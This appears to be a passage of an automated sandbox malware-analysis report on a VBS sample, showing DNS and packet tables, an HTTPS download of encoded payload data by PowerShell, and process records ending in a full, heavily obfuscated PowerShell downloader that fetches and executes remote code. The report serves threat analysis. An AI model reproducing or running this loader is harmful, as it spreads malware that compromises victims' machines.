                                                    Dec 8, 2024 19:27:05.115580082 CET49731443192.168.2.4103.53.42.63
                                                    Dec 8, 2024 19:27:05.121129990 CET44349731103.53.42.63192.168.2.4
                                                    Dec 8, 2024 19:27:05.121201038 CET49731443192.168.2.4103.53.42.63
                                                    Dec 8, 2024 19:27:05.125428915 CET44349731103.53.42.63192.168.2.4
                                                    Dec 8, 2024 19:27:05.125494003 CET49731443192.168.2.4103.53.42.63
                                                    Dec 8, 2024 19:27:05.189028978 CET44349731103.53.42.63192.168.2.4
                                                    Dec 8, 2024 19:27:05.189227104 CET49731443192.168.2.4103.53.42.63
                                                    Dec 8, 2024 19:27:05.193248987 CET44349731103.53.42.63192.168.2.4
                                                    Dec 8, 2024 19:27:05.193329096 CET49731443192.168.2.4103.53.42.63
                                                    Dec 8, 2024 19:27:05.198873997 CET44349731103.53.42.63192.168.2.4
                                                    Dec 8, 2024 19:27:05.198937893 CET49731443192.168.2.4103.53.42.63
                                                    Dec 8, 2024 19:27:05.202549934 CET44349731103.53.42.63192.168.2.4
                                                    Dec 8, 2024 19:27:05.202626944 CET49731443192.168.2.4103.53.42.63
                                                    Dec 8, 2024 19:27:05.208332062 CET44349731103.53.42.63192.168.2.4
                                                    Dec 8, 2024 19:27:05.208410025 CET49731443192.168.2.4103.53.42.63
                                                    Dec 8, 2024 19:27:05.212512016 CET44349731103.53.42.63192.168.2.4
                                                    Dec 8, 2024 19:27:05.212582111 CET49731443192.168.2.4103.53.42.63
                                                    Dec 8, 2024 19:27:05.216857910 CET44349731103.53.42.63192.168.2.4
                                                    Dec 8, 2024 19:27:05.216919899 CET49731443192.168.2.4103.53.42.63
                                                    Dec 8, 2024 19:27:05.222421885 CET44349731103.53.42.63192.168.2.4
                                                    Dec 8, 2024 19:27:05.222529888 CET49731443192.168.2.4103.53.42.63
                                                    Dec 8, 2024 19:27:05.226757050 CET44349731103.53.42.63192.168.2.4
                                                    Dec 8, 2024 19:27:05.227277040 CET49731443192.168.2.4103.53.42.63
                                                    Dec 8, 2024 19:27:05.231362104 CET44349731103.53.42.63192.168.2.4
                                                    Dec 8, 2024 19:27:05.231430054 CET49731443192.168.2.4103.53.42.63
                                                    Dec 8, 2024 19:27:05.235388994 CET44349731103.53.42.63192.168.2.4
                                                    Dec 8, 2024 19:27:05.235451937 CET49731443192.168.2.4103.53.42.63
                                                    Dec 8, 2024 19:27:05.239490986 CET44349731103.53.42.63192.168.2.4
                                                    Dec 8, 2024 19:27:05.239552021 CET49731443192.168.2.4103.53.42.63
                                                    Dec 8, 2024 19:27:05.239558935 CET44349731103.53.42.63192.168.2.4
                                                    Dec 8, 2024 19:27:05.239573002 CET44349731103.53.42.63192.168.2.4
                                                    Dec 8, 2024 19:27:05.239628077 CET49731443192.168.2.4103.53.42.63
                                                    Dec 8, 2024 19:27:05.242820024 CET49731443192.168.2.4103.53.42.63

                                                    UDP Packets

                                                    TimestampSource PortDest PortSource IPDest IP
                                                    Dec 8, 2024 19:27:00.047355890 CET5496153192.168.2.41.1.1.1
                                                    Dec 8, 2024 19:27:01.051575899 CET5496153192.168.2.41.1.1.1
                                                    Dec 8, 2024 19:27:01.130376101 CET53549611.1.1.1192.168.2.4
                                                    Dec 8, 2024 19:27:01.188755035 CET53549611.1.1.1192.168.2.4

                                                    DNS Queries

                                                    TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                    Dec 8, 2024 19:27:00.047355890 CET192.168.2.41.1.1.10xd3a6Standard query (0)www.ftsengineers.comA (IP address)IN (0x0001)false
                                                    Dec 8, 2024 19:27:01.051575899 CET192.168.2.41.1.1.10xd3a6Standard query (0)www.ftsengineers.comA (IP address)IN (0x0001)false

                                                    DNS Answers

                                                    TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                    Dec 8, 2024 19:27:01.130376101 CET1.1.1.1192.168.2.40xd3a6No error (0)www.ftsengineers.comftsengineers.comCNAME (Canonical name)IN (0x0001)false
                                                    Dec 8, 2024 19:27:01.130376101 CET1.1.1.1192.168.2.40xd3a6No error (0)ftsengineers.com103.53.42.63A (IP address)IN (0x0001)false
                                                    Dec 8, 2024 19:27:01.188755035 CET1.1.1.1192.168.2.40xd3a6No error (0)www.ftsengineers.comftsengineers.comCNAME (Canonical name)IN (0x0001)false
                                                    Dec 8, 2024 19:27:01.188755035 CET1.1.1.1192.168.2.40xd3a6No error (0)ftsengineers.com103.53.42.63A (IP address)IN (0x0001)false

                                                    HTTP Request Dependency Graph

                                                    • www.ftsengineers.com

                                                    HTTPS Proxied Packets

                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    0192.168.2.449731103.53.42.634431732C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                    TimestampBytes transferredDirectionData
                                                    2024-12-08 18:27:03 UTC183OUTGET /km/microcheilia.dwp HTTP/1.1
                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                    Host: www.ftsengineers.com
                                                    Connection: Keep-Alive
                                                    2024-12-08 18:27:03 UTC209INHTTP/1.1 200 OK
                                                    Date: Sun, 08 Dec 2024 18:27:03 GMT
                                                    Server: Apache
                                                    Upgrade: h2,h2c
                                                    Connection: Upgrade, close
                                                    Last-Modified: Fri, 06 Dec 2024 00:37:29 GMT
                                                    Accept-Ranges: bytes
                                                    Content-Length: 461264
                                                    2024-12-08 18:27:03 UTC7983INData Raw: 63 51 47 62 36 77 4b 50 4b 72 74 31 6f 77 6b 41 36 77 4c 32 7a 75 73 43 59 69 41 44 58 43 51 45 36 77 49 62 58 58 45 42 6d 37 6d 33 59 32 5a 66 63 51 47 62 63 51 47 62 67 65 6e 74 74 69 41 38 63 51 47 62 63 51 47 62 67 66 48 4b 72 45 55 6a 36 77 49 47 54 33 45 42 6d 33 45 42 6d 2b 73 43 34 65 4f 36 79 4e 62 61 52 2b 73 43 66 64 5a 78 41 5a 74 78 41 5a 76 72 41 73 75 72 4d 63 72 72 41 70 37 4c 36 77 4a 47 49 34 6b 55 43 33 45 42 6d 2b 73 43 36 2b 6a 52 34 6e 45 42 6d 2b 73 43 37 2b 53 44 77 51 54 72 41 68 2b 76 36 77 4a 46 48 34 48 35 53 37 2b 65 41 48 7a 4a 36 77 4a 70 6e 6e 45 42 6d 34 74 45 4a 41 52 78 41 5a 76 72 41 76 4f 51 69 63 50 72 41 69 58 74 36 77 4c 31 2b 59 48 44 4c 72 4e 73 41 48 45 42 6d 2b 73 43 55 64 75 36 52 6d 57 70 42 2b 73 43 45 52 56
                                                    Data Ascii: cQGb6wKPKrt1owkA6wL2zusCYiADXCQE6wIbXXEBm7m3Y2ZfcQGbcQGbgenttiA8cQGbcQGbgfHKrEUj6wIGT3EBm3EBm+sC4eO6yNbaR+sCfdZxAZtxAZvrAsurMcrrAp7L6wJGI4kUC3EBm+sC6+jR4nEBm+sC7+SDwQTrAh+v6wJFH4H5S7+eAHzJ6wJpnnEBm4tEJARxAZvrAvOQicPrAiXt6wL1+YHDLrNsAHEBm+sCUdu6RmWpB+sCERV
                                                    2024-12-08 18:27:04 UTC8000INData Raw: 53 48 69 4c 67 41 6f 4e 30 41 44 4e 73 61 73 47 6b 49 6c 30 32 2b 56 2f 64 7a 51 38 31 34 45 4c 6f 63 55 79 52 48 67 77 77 46 65 33 54 6c 78 70 70 55 6d 4f 68 50 56 68 37 67 4f 6a 6e 65 30 46 6d 34 62 48 5a 6e 67 76 30 53 44 69 51 75 66 74 67 46 61 32 65 6f 58 41 57 2b 69 69 37 66 59 41 66 46 74 6f 55 34 51 6b 49 37 36 70 72 72 4c 36 58 4e 6c 53 31 6a 51 2b 6d 34 66 66 67 38 66 79 54 51 41 64 33 32 32 6f 53 53 59 50 33 47 48 71 51 6a 33 69 7a 4d 7a 70 4b 71 6b 32 49 7a 30 50 74 78 57 73 7a 70 6f 65 39 77 6d 67 4d 4d 4a 50 73 48 6a 49 61 61 51 4d 77 77 4e 55 4d 4d 42 70 70 44 44 41 61 61 51 77 77 47 6d 6b 4d 4d 42 70 70 44 44 41 61 6d 77 4d 70 57 4d 72 46 68 68 61 65 30 72 71 69 63 46 55 76 4e 54 36 7a 74 52 36 47 47 37 48 31 4b 6b 46 71 4f 2b 6a 6a 63 71
                                                    Data Ascii: SHiLgAoN0ADNsasGkIl02+V/dzQ814ELocUyRHgwwFe3TlxppUmOhPVh7gOjne0Fm4bHZngv0SDiQuftgFa2eoXAW+ii7fYAfFtoU4QkI76prrL6XNlS1jQ+m4ffg8fyTQAd322oSSYP3GHqQj3izMzpKqk2Iz0PtxWszpoe9wmgMMJPsHjIaaQMwwNUMMBppDDAaaQwwGmkMMBppDDAamwMpWMrFhhae0rqicFUvNT6ztR6GG7H1KkFqO+jjcq
                                                    2024-12-08 18:27:04 UTC8000INData Raw: 6f 2b 32 4f 5a 66 66 4f 78 39 53 75 73 67 57 45 36 6b 4c 6e 35 59 44 65 74 66 4f 7a 4c 51 68 66 4e 41 4b 63 4f 31 51 65 69 75 2f 67 35 4c 5a 58 63 68 6a 4e 44 72 4d 66 73 6f 75 6e 74 61 6d 4a 59 6f 79 73 43 76 38 71 59 69 69 6f 55 78 42 51 74 66 2f 49 4f 4b 50 59 77 61 77 7a 5a 77 4a 36 47 56 31 62 74 71 4c 4b 74 52 51 47 6d 74 4c 48 39 58 59 6e 33 35 42 36 66 6d 36 69 4f 38 37 71 48 6a 63 48 5a 38 4e 62 56 6d 34 43 67 39 33 4d 52 58 4b 79 54 69 51 30 34 68 2b 7a 31 53 78 61 39 57 75 74 2b 31 31 30 4a 39 53 43 43 61 4c 48 30 2f 64 65 4f 67 6b 48 54 78 54 7a 6f 4b 50 4e 75 6d 69 41 56 53 76 74 36 41 42 50 66 68 4a 39 7a 2f 59 59 35 41 4c 35 32 45 62 6e 37 6f 76 44 41 6b 46 61 66 6f 56 51 49 37 54 43 4e 42 44 36 32 7a 74 43 70 50 72 4d 64 76 77 64 63 73 64
                                                    Data Ascii: o+2OZffOx9SusgWE6kLn5YDetfOzLQhfNAKcO1Qeiu/g5LZXchjNDrMfsountamJYoysCv8qYiioUxBQtf/IOKPYwawzZwJ6GV1btqLKtRQGmtLH9XYn35B6fm6iO87qHjcHZ8NbVm4Cg93MRXKyTiQ04h+z1Sxa9Wut+110J9SCCaLH0/deOgkHTxTzoKPNumiAVSvt6ABPfhJ9z/YY5AL52Ebn7ovDAkFafoVQI7TCNBD62ztCpPrMdvwdcsd
                                                    2024-12-08 18:27:04 UTC8000INData Raw: 37 63 4f 71 2b 48 68 31 71 4a 7a 61 46 74 63 52 6f 44 44 43 69 50 6c 77 76 49 56 7a 55 7a 53 78 68 58 49 6a 39 4a 37 6c 36 4c 78 6e 72 4a 73 39 63 48 41 51 59 30 7a 6b 73 6c 63 52 72 42 64 41 57 41 48 4b 54 65 65 4f 56 6d 4b 6f 74 4f 72 34 56 65 6b 77 59 39 4d 70 67 44 6b 70 41 74 32 59 51 38 63 6c 34 61 48 45 48 48 4e 51 4b 4e 47 73 70 79 38 41 56 32 39 4b 35 4e 54 46 65 69 75 6b 61 56 63 75 62 67 37 55 54 72 4e 53 4e 38 73 74 74 74 6a 43 62 6d 7a 45 74 45 6d 43 4e 77 6e 2b 4b 57 51 65 54 59 39 53 47 63 36 55 56 79 30 47 59 38 55 71 67 4a 48 41 30 65 4c 58 6b 50 32 30 6e 7a 73 74 46 65 52 44 5a 4a 52 69 35 67 41 6d 52 6b 64 50 53 63 6f 7a 4c 52 73 54 64 61 68 2b 51 46 78 30 66 52 49 53 70 54 46 46 63 75 35 2b 33 44 54 41 61 4f 62 52 71 39 42 64 33 42 56
                                                    Data Ascii: 7cOq+Hh1qJzaFtcRoDDCiPlwvIVzUzSxhXIj9J7l6LxnrJs9cHAQY0zkslcRrBdAWAHKTeeOVmKotOr4VekwY9MpgDkpAt2YQ8cl4aHEHHNQKNGspy8AV29K5NTFeiukaVcubg7UTrNSN8stttjCbmzEtEmCNwn+KWQeTY9SGc6UVy0GY8UqgJHA0eLXkP20nzstFeRDZJRi5gAmRkdPScozLRsTdah+QFx0fRISpTFFcu5+3DTAaObRq9Bd3BV
                                                    2024-12-08 18:27:04 UTC8000INData Raw: 72 56 62 58 51 4d 56 71 4f 6e 42 36 78 46 70 75 66 2b 63 58 6a 39 59 33 47 7a 2f 4a 49 69 70 4e 33 50 47 78 41 6d 50 64 63 53 76 36 59 57 7a 4f 2b 65 41 4f 68 58 61 2f 7a 46 49 72 4a 79 58 68 37 61 6d 42 6f 62 48 4f 2b 79 42 62 56 6a 2b 38 75 6c 78 6e 50 4e 34 33 43 73 47 48 48 59 78 56 6f 46 59 73 61 61 51 77 77 47 6d 6b 4d 4d 42 70 70 44 44 41 61 61 51 77 77 47 6d 6b 4d 31 52 4d 57 47 52 47 71 4f 43 51 41 74 49 75 75 4c 2b 4e 4a 37 66 6f 6b 2b 67 37 30 6b 69 69 2b 57 4c 66 46 6f 72 6f 47 5a 73 73 42 34 57 6b 4d 4d 42 70 70 44 44 41 61 61 51 77 77 47 6d 6b 4d 4d 42 70 70 44 44 44 6b 34 2b 46 6b 2f 72 51 5a 47 4c 62 63 76 4d 46 6e 42 6f 38 5a 41 6b 4b 41 50 56 36 67 4f 77 6e 4d 34 70 6d 48 47 32 6b 4d 50 35 39 6d 39 4d 2f 6c 50 37 4a 37 6f 54 4e 75 73 64
                                                    Data Ascii: rVbXQMVqOnB6xFpuf+cXj9Y3Gz/JIipN3PGxAmPdcSv6YWzO+eAOhXa/zFIrJyXh7amBobHO+yBbVj+8ulxnPN43CsGHHYxVoFYsaaQwwGmkMMBppDDAaaQwwGmkM1RMWGRGqOCQAtIuuL+NJ7fok+g70kii+WLfForoGZssB4WkMMBppDDAaaQwwGmkMMBppDDDk4+Fk/rQZGLbcvMFnBo8ZAkKAPV6gOwnM4pmHG2kMP59m9M/lP7J7oTNusd
                                                    2024-12-08 18:27:04 UTC8000INData Raw: 6c 48 66 51 56 37 5a 64 68 48 6d 6b 78 79 4c 34 44 4a 7a 2b 65 2b 56 30 30 47 6c 52 4d 49 6a 31 38 41 37 53 66 4f 41 67 77 4a 39 57 48 59 71 31 6d 69 45 70 4c 62 51 79 35 6c 30 55 4f 4d 42 72 6f 39 73 37 56 38 6b 32 4a 52 56 59 32 7a 6e 7a 6f 38 6a 61 64 36 50 31 72 6b 58 76 68 74 64 4c 6f 35 65 6d 34 70 53 57 78 38 30 49 64 62 50 4d 50 69 65 67 6a 35 43 41 79 47 6d 6d 48 76 54 5a 72 44 44 41 56 37 43 66 50 35 5a 59 30 2b 30 6a 54 55 46 4c 6d 7a 59 33 43 51 35 72 36 46 4a 75 72 2f 6b 66 49 52 59 33 43 58 33 2b 79 39 5a 75 44 69 41 74 34 41 49 55 43 38 64 63 4e 75 73 35 78 79 33 47 45 30 50 4b 30 42 74 61 38 4e 79 35 61 7a 46 4c 53 69 59 70 58 52 70 78 71 4d 65 4e 67 62 51 78 61 4a 35 64 51 6f 6e 4c 69 2f 72 6f 51 33 4e 6e 71 55 31 61 37 56 7a 56 65 69 6f
                                                    Data Ascii: lHfQV7ZdhHmkxyL4DJz+e+V00GlRMIj18A7SfOAgwJ9WHYq1miEpLbQy5l0UOMBro9s7V8k2JRVY2znzo8jad6P1rkXvhtdLo5em4pSWx80IdbPMPiegj5CAyGmmHvTZrDDAV7CfP5ZY0+0jTUFLmzY3CQ5r6FJur/kfIRY3CX3+y9ZuDiAt4AIUC8dcNus5xy3GE0PK0Bta8Ny5azFLSiYpXRpxqMeNgbQxaJ5dQonLi/roQ3NnqU1a7VzVeio
                                                    2024-12-08 18:27:04 UTC8000INData Raw: 46 46 6b 44 56 37 6a 2f 42 49 6f 6f 2f 2f 50 4c 70 4c 54 51 61 34 4a 6d 76 47 32 6b 4d 75 64 67 37 68 36 57 46 61 41 77 77 66 47 62 4c 42 68 70 70 44 44 41 61 61 51 77 77 47 6d 6b 4d 4d 42 70 70 44 44 41 61 61 51 7a 56 63 6a 65 73 67 4e 4c 30 55 58 34 32 6c 38 50 52 78 73 54 7a 4e 72 63 44 39 2f 64 68 38 4b 48 73 61 51 41 52 48 74 6b 36 74 30 61 34 67 36 47 78 36 62 77 47 6b 73 76 6f 2f 35 4f 7a 49 58 42 68 68 75 44 74 4d 51 50 30 4e 63 39 6b 63 6b 4c 4e 2b 2b 6a 4d 49 55 71 59 4b 44 59 38 67 41 52 30 65 61 46 59 54 44 53 59 39 38 56 78 2f 62 70 72 62 37 73 4b 41 47 54 50 45 57 36 6a 55 4e 39 70 66 4f 6a 7a 78 31 49 79 35 46 47 76 61 77 78 59 37 6f 47 63 42 45 6e 53 4c 6d 43 6a 33 59 33 44 74 4b 50 72 57 5a 75 61 54 67 53 34 34 34 33 44 4f 38 75 31 35 35
                                                    Data Ascii: FFkDV7j/BIoo//PLpLTQa4JmvG2kMudg7h6WFaAwwfGbLBhppDDAaaQwwGmkMMBppDDAaaQzVcjesgNL0UX42l8PRxsTzNrcD9/dh8KHsaQARHtk6t0a4g6Gx6bwGksvo/5OzIXBhhuDtMQP0Nc9kckLN++jMIUqYKDY8gAR0eaFYTDSY98Vx/bprb7sKAGTPEW6jUN9pfOjzx1Iy5FGvawxY7oGcBEnSLmCj3Y3DtKPrWZuaTgS4443DO8u155
                                                    2024-12-08 18:27:04 UTC8000INData Raw: 59 74 45 32 69 45 6f 73 68 59 6a 57 77 44 37 2b 74 66 49 6f 67 69 74 71 36 45 4b 74 7a 6a 58 59 43 54 61 50 4d 37 79 4c 4d 58 6b 46 61 6f 4c 50 62 53 50 32 4f 32 44 73 32 44 65 33 71 61 4a 73 55 66 4c 49 4a 61 51 77 2f 6c 58 67 71 4e 42 6f 7a 5a 4e 56 61 41 7a 5a 67 6f 68 66 70 56 44 31 73 35 65 32 36 62 67 6e 34 50 33 45 6f 48 54 57 42 45 57 4e 4e 39 59 58 58 45 32 36 52 56 70 2b 35 65 44 65 61 44 77 43 4d 31 35 61 47 68 72 39 72 6e 49 30 33 47 6a 4b 2b 47 36 45 4b 50 5a 75 52 4b 30 72 68 6c 75 65 72 36 74 46 75 51 70 45 6e 38 33 32 32 49 57 71 78 34 49 41 66 62 79 4b 56 56 4c 45 65 54 61 66 47 59 32 78 71 50 39 31 61 44 44 41 61 61 51 77 77 47 6d 6b 4d 4d 42 70 70 44 44 41 61 61 51 77 77 47 70 54 71 54 78 57 65 61 48 43 2b 2b 2b 5a 49 4d 31 70 64 46 67
                                                    Data Ascii: YtE2iEoshYjWwD7+tfIogitq6EKtzjXYCTaPM7yLMXkFaoLPbSP2O2Ds2De3qaJsUfLIJaQw/lXgqNBozZNVaAzZgohfpVD1s5e26bgn4P3EoHTWBEWNN9YXXE26RVp+5eDeaDwCM15aGhr9rnI03GjK+G6EKPZuRK0rhluer6tFuQpEn8322IWqx4IAfbyKVVLEeTafGY2xqP91aDDAaaQwwGmkMMBppDDAaaQwwGpTqTxWeaHC+++ZIM1pdFg
                                                    2024-12-08 18:27:04 UTC8000INData Raw: 52 58 6f 36 6d 6e 44 6e 4e 6a 57 70 58 42 5a 7a 32 78 37 67 76 68 39 61 53 6c 57 77 31 70 44 4d 2f 57 71 79 54 6a 77 55 32 68 2b 33 4e 52 67 76 7a 73 4e 63 6b 62 5a 33 6e 75 6a 4e 62 44 58 64 71 78 6c 71 50 53 56 67 59 70 63 76 36 4e 36 71 74 52 78 38 54 5a 37 78 6b 4e 35 70 58 6e 71 30 50 6a 63 75 53 48 31 4b 30 79 6a 46 64 59 71 41 73 65 68 69 4d 36 50 34 73 39 39 49 54 73 65 69 6a 50 33 4f 77 36 4f 61 6a 76 62 6b 76 59 59 62 67 37 54 6b 4c 39 44 54 34 61 47 49 54 67 76 35 55 41 65 51 6c 63 48 49 6f 79 7a 66 4d 6b 7a 5a 74 4f 34 39 78 66 63 48 4e 57 31 39 68 61 6a 56 55 42 39 35 39 39 4a 45 52 4d 6b 64 6b 55 63 49 62 46 57 5a 4f 55 65 42 70 49 36 4e 57 75 35 66 67 44 54 41 61 70 65 36 6d 66 58 55 69 63 62 30 64 48 55 61 36 49 4b 70 77 7a 56 54 38 51 74
                                                    Data Ascii: RXo6mnDnNjWpXBZz2x7gvh9aSlWw1pDM/WqyTjwU2h+3NRgvzsNckbZ3nujNbDXdqxlqPSVgYpcv6N6qtRx8TZ7xkN5pXnq0PjcuSH1K0yjFdYqAsehiM6P4s99ITseijP3Ow6OajvbkvYYbg7TkL9DT4aGITgv5UAeQlcHIoyzfMkzZtO49xfcHNW19hajVUB9599JERMkdkUcIbFWZOUeBpI6NWu5fgDTAape6mfXUicb0dHUa6IKpwzVT8Qt
                                                    2024-12-08 18:27:04 UTC8000INData Raw: 4a 44 53 43 48 44 34 6e 77 59 45 79 62 6f 6e 4d 51 37 78 73 72 69 33 59 50 2b 30 62 55 2f 4e 65 66 48 43 51 6c 46 77 58 54 50 57 79 73 73 47 7a 49 47 78 75 61 2f 49 4f 71 56 44 65 33 74 68 59 64 55 50 52 39 38 30 6e 34 42 76 50 32 74 4e 49 78 4e 4e 56 41 70 58 51 7a 32 54 70 2f 59 31 72 54 66 2b 68 66 6b 63 42 42 39 2f 57 54 4e 33 37 68 6b 35 6a 57 30 45 74 77 33 54 69 31 71 77 6b 37 58 4c 48 72 63 65 44 72 66 75 6a 4e 54 52 73 66 78 32 4f 47 34 4f 38 35 45 66 53 4a 78 6d 70 44 73 70 42 78 41 31 75 4a 58 55 35 2f 4e 31 43 42 76 2b 54 75 63 37 38 57 48 62 34 61 30 38 52 32 43 72 4a 51 70 6b 71 2f 6d 2f 43 67 2f 61 38 55 62 65 31 33 73 72 76 30 73 2f 6d 46 6c 72 2f 6c 36 6c 59 6a 71 6c 63 4a 77 7a 43 46 72 52 70 72 44 44 43 68 6f 52 31 7a 46 67 38 44 39 79
                                                    Data Ascii: JDSCHD4nwYEybonMQ7xsri3YP+0bU/NefHCQlFwXTPWyssGzIGxua/IOqVDe3thYdUPR980n4BvP2tNIxNNVApXQz2Tp/Y1rTf+hfkcBB9/WTN37hk5jW0Etw3Ti1qwk7XLHrceDrfujNTRsfx2OG4O85EfSJxmpDspBxA1uJXU5/N1CBv+Tuc78WHb4a08R2CrJQpkq/m/Cg/a8Ube13srv0s/mFlr/l6lYjqlcJwzCFrRprDDChoR1zFg8D9y


                                                    Statistics

                                                    CPU Usage

                                                    Click to jump to process

                                                    Memory Usage

                                                    Click to jump to process

                                                    High Level Behavior Distribution

                                                    Click to dive into process behavior distribution

                                                    Behavior

                                                    Click to jump to process

                                                    System Behavior

                                                    General

                                                    Target ID:0
                                                    Start time:13:26:53
                                                    Start date:08/12/2024
                                                    Path:C:\Windows\System32\wscript.exe
                                                    Wow64 process (32bit):false
                                                    Commandline:C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\S1a5ZF3ytp.vbs"
                                                    Imagebase:0x7ff68bad0000
                                                    File size:170'496 bytes
                                                    MD5 hash:A47CBE969EA935BDD3AB568BB126BC80
                                                    Has elevated privileges:false
                                                    Has administrator privileges:false
                                                    Programmed in:C, C++ or other language
                                                    Reputation:high
                                                    Has exited:true

                                                    General

                                                    Target ID:1
                                                    Start time:13:26:56
                                                    Start date:08/12/2024
                                                    Path:C:\Windows\System32\wbem\WMIC.exe
                                                    Wow64 process (32bit):false
                                                    Commandline:wmic diskdrive get caption,serialnumber
                                                    Imagebase:0x7ff687fc0000
                                                    File size:576'000 bytes
                                                    MD5 hash:C37F2F4F4B3CD128BDABCAEB2266A785
                                                    Has elevated privileges:false
                                                    Has administrator privileges:false
                                                    Programmed in:C, C++ or other language
                                                    Reputation:high
                                                    Has exited:true

                                                    General

                                                    Target ID:2
                                                    Start time:13:26:56
                                                    Start date:08/12/2024
                                                    Path:C:\Windows\System32\conhost.exe
                                                    Wow64 process (32bit):false
                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                    Imagebase:0x7ff7699e0000
                                                    File size:862'208 bytes
                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                    Has elevated privileges:false
                                                    Has administrator privileges:false
                                                    Programmed in:C, C++ or other language
                                                    Reputation:high
                                                    Has exited:true

                                                    General

                                                    Target ID:3
                                                    Start time:13:26:57
                                                    Start date:08/12/2024
                                                    Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                    Wow64 process (32bit):false
                                                    Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" ";$Polars229='Afkvistning158';;$Navier='kompetencegivende';;$Ndudgangen9='semipreserved';;$Straalepletten='Knaldgassen';;$Forhales=$host.Name;function Tilbageholdte($Satirisation){If ($Forhales) {$Nonanarchically=2} for ($Jurywoman=$Nonanarchically;;$Jurywoman+=3){if(!$Satirisation[$Jurywoman]){cls;break }$Halomancy+=$Satirisation[$Jurywoman];$Hiveward='Schweizerostens'}$Halomancy}function Containeriseringers($Taltes213){ .($Murage) ($Taltes213)}$Plagen=Tilbageholdte ' SNRee gt c. Uw';$Plagen+=Tilbageholdte ' ae aB.lC.ulE i EeSiN at';$Moonscape=Tilbageholdte 'B,MCoo,tz,hi Sl,al Cao /';$elegiker=Tilbageholdte ' aT TlFlsto1Fo2';$Ungeneral='Ar[T.npuEM TM .BiSDuE rFeV ITrc oEPaP.poNaISunIstS.MRiAAmNBua nGHaESdr M]Kn:So:StsC eSeCFaU yr aI utA,y RpAlrMaoU t OKoCKootaL,u=Pe$ eEB.lS eFlg OiOmK BeBir';$Moonscape+=Tilbageholdte 'Mo5Gu. u0La G( LW viKrnT d oKawCosVi O.NHeTRe i1Ae0 r.Ap0Sl;st ,eW Si .nH 6Bo4Dr; u ,ix i6 H4O,;Ke Lur RvA :Pi1L 3Fo1Va.Bu0Ab) d ,GBae cDekHao /tr2Va0Re1E.0an0 M1As0Ne1 L TiFSei MrNeeSef CoDrx o/R 1Cy3 T1.o.So0';$Retransform=Tilbageholdte ' FUT sC,eTeris-skA ag,eeRen Ct';$Automatteoriens=Tilbageholdte 'RuhSath.tSpp jsE :Qu/ e/T w Tw OwKr. vfVitGasMae n gKriS nTreSte rL.sTr. Ac RoT.mF /RekSpmG./RemLyimecNarP.oHocOvhTheDri SlReiW a L.Sid Kw.rp Q> jh lt It.opEvsFo:hy/ e/N w CwSkwfu. opAfu bn eS.e itfa.Tra eesl/HykRumGa/ vmE,iHuc CrSmoG cDrh .e HiPalK iWaaC,. rd w op';$Sterne=Tilbageholdte 'Bi>';$Murage=Tilbageholdte 'BeiEaEFrX';$Svejsemestre='Teddybjrnenes';$Groteskes='\bethink.Sal';Containeriseringers (Tilbageholdte 'K.$FogUdl iO.eBRoA,mlk,:SeeCaN HERiB rrH rChi SCuEDiNAleH SSa=Af$ .EflnTrv I: Fa uPAnp D.eAMet aKr+S,$Kng cR,doK tRuE oSReK E.as');Containeriseringers (Tilbageholdte 'Sc$Ovg .LTho ,b EAVrlSa:VilUnA,nGRer CI.rn.pg SsArFBlO TRS M .3Re7Go=E $ .A.juFlt O oM hA eTLaT.oeThoc R PiSpeFoN rS A.KlsN pUnL ri STHo(Sl$PesJeT EArRG N yEMu)');Containeriseringers (Tilbageholdte $Ungeneral);$Automatteoriens=$Lagringsform37[0];$Bygders=(Tilbageholdte ' P$brgT lS O Sb.uAC L : PbAmIS,RSkGBoiSpTQuTH iHjN MERarFrE BnSks .=F.NFieF wSt-SmoPeBGyj BeHocK,T US.nyJoSStt GER M K.l $Sap DlBiaL.g eCoN');Containeriseringers ($Bygders);Containeriseringers (Tilbageholdte '.o$PrBPeiCorD gPri FtJ.t .i Sn heSorEreannKus i.OrHudeAraMid,eeRarKosCa[Po$StRHeeG.tSar Oa,inSrsShfK.oF rPrmS ]Fa=Gr$JeMSto EoOvnPas,dcKua gpSie');$Netmave=Tilbageholdte ' S$ .BGoiF.rReg,ai at Dt si ,nn e MrS eHjns,s . .DBooFlwB nudl OoLraPedcaFB itrlc e H(Dr$AaA au NtProUnmSeaMittotS eDioKor iReeAnnA,sri, $ VIHunMadDioIrpAth yeOrnUni CnEp)';$Indophenin=$Enebrrisenes;Containeriseringers (Tilbageholdte 'T $,nGM.lstOFeB cA.oL E:InI dnFuGGoET f MR DM iAB.RSpmCoEf LAfaB DGeE o= F(.yt Ee aSBat f-AtP,aa ,t ah i y$UnI KnChd .O ,pUnHUdE ,n Ki ,nBe)');while (!$Ingefrmarmelade) {Containeriseringers (Tilbageholdte ' e$ ig slBuoBrbSpa AlBl:M DfieDonNonLoiUnsBusmo=Se$FoTreoA k.eo tmTrpUmoT.nPaeBenVktEne es') ;Containeriseringers $Netmave;Containeriseringers (Tilbageholdte ' ,sSaTFaaAvRUftTi- s gl.aEPeeBiPPl oo4');Containeriseringers (Tilbageholdte 'Ud$ aGRiL .oNabTyA olAn:BeI NnUrGd Eb f eR SMVgA prB mutE,el,oa DDiEB =K.(G TOmESkSbrt .- apBrA iTQuh , ,$ dIslN BDVao rpLyhOxeP nw iPln u)') ;Containeriseringers (Tilbageholdte 'F.$AfgPelCloL bSpaS,LE :LoFP,oBor HfA jU,ETir SDG iGuNS,GAce arBa=Gr$JyG olCooA b .ALvLM : oPWao SI GnFiTD,w.eaG yStS ,+ X+ e%I $HoLPra GG dRM iPoN uGTes.rF WO hrunMB 3 l7Wo.UnC lOKnUUfn Kt') ;$Automatteoriens=$Lagringsform37[$Forfjerdinger]}$Agrees=317274;$Unanalytic=28672;Containeriseringers (Tilbageholdte 'W $GaGStlTeo rbMyA.il n:,dS atPrRVeA AIEjnDiS . Un=,c TgFeEC T c-,oC TO,aN,aTSeeToN .TYa Ve$PaIFiN PDTrO UpS H ESknHyIEnN');Containeriseringers 